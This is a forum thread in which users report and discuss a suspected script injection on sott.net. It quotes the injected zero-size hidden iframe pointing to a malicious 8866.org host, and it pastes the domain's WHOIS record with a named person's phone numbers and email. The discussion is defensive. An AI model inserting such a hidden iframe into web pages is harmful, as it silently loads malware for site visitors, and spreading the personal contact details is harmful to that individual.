I think Sott is under attack

[Ellipse]

I hope I'm wrong but look like a a cross-scripting attack had insert an iframe here : http://www.sott.net/podcast/podcast_transcripts.php

The begin of html code generated :

<iframe src= _http://nhgjhgb122.8866.org:8843/AM05/index.html width=0 height=0></iframe>‹���

I saw it because of this thread : https://www.cassiopaea.org/forum/index.php?topic=21494.0

 

[Sirius]

Hi Ellipse,

Ah, that could very well be the case. One day (2011-01-21, 01:46 PM) I saw something very similar to this, however on the sott.net frontpage. And, fortunately, I took two screenshots (can upload only small images), one presenting what I actually saw on the screen, the other shows the source code.

What I could find:
_http://www.avgthreatlabs.com/sitereports/domain/8866.org
_http://google.com/safebrowsing/diagnostic?site=8866.org
... among many other sites mentioning XSS infection in conjunction with this ominous domain.

 

[Stranger]

Noticed the same. There was a frame with a similiar domain like nhgjhgb122.8866.org and the complete website was full of source code.

 

[Vulcan59]

Thanks all. I'll highlight it to our tech guru and see what he has to say. I had this problem when I was running SMForum but that was on a shared server and I didn't think that Cassiopaea would be vulnerable to it.

 

[Ellipse]

8866.org seem to be down now but when I posted the message it was a Japanese or Chinese site (I don't remember exactly).

 

[D69]

Chinese ;)

Domain Name:8866.ORG

Admin Name:Peng Yong
Admin Organization:Yaako Ltd.
Admin Street1:1406, Yinyuan Building
Admin Street2:1406, Yinyuan Building
Admin Street3:
Admin City:Changzhou
Admin State/Province:Jiangsu
Admin Postal Code:213002
Admin Country:CN
Admin Phone:+86.51988056600
Admin Phone Ext.:
Admin FAX:+86.2161947030
Admin FAX Ext.:
Admin Email:ppyy@astpbx.com
Tech ID:ONLC-1348759-2
Tech Name:Peng Yong
Tech Organization:Yaako Ltd.
Tech Street1:1406, Yinyuan Building
Tech Street2:1406, Yinyuan Building
Tech Street3:
Tech City:Changzhou
Tech State/Province:Jiangsu
Tech Postal Code:213002
Tech Country:CN
Tech Phone:+86.51988056600
Tech Phone Ext.:
Tech FAX:+86.2161947030
Tech FAX Ext.:
Tech Email:ppyy@astpbx.com

EDIT: more info

__http://www.mywot.com/en/scorecard/8866.org
__http://www.avgthreatlabs.com/sitereports/domain/8866.org
__http://extraexploit.blogspot.com/2010/01/cve-2010-0249-in-wild-xx2228866org-and.html

 

[Scottie]

There's nothing wrong with the source itself on SOTT (I just checked).
It appears to be one of those redirection/cache poisoning situations (see my article in The Dot Connector Magazine #13 for more info!)

;D

 

[Cosmos]

There's nothing wrong with the source itself on SOTT (I just checked).
It appears to be one of those redirection/cache poisoning situations (see my article in The Dot Connector Magazine #13 for more info!)

;D

what a coincidence !
did you have those kind of attacks before you published the Dot Connector ?

 

[Scottie]

Yup. Several times. That's how I learned about them!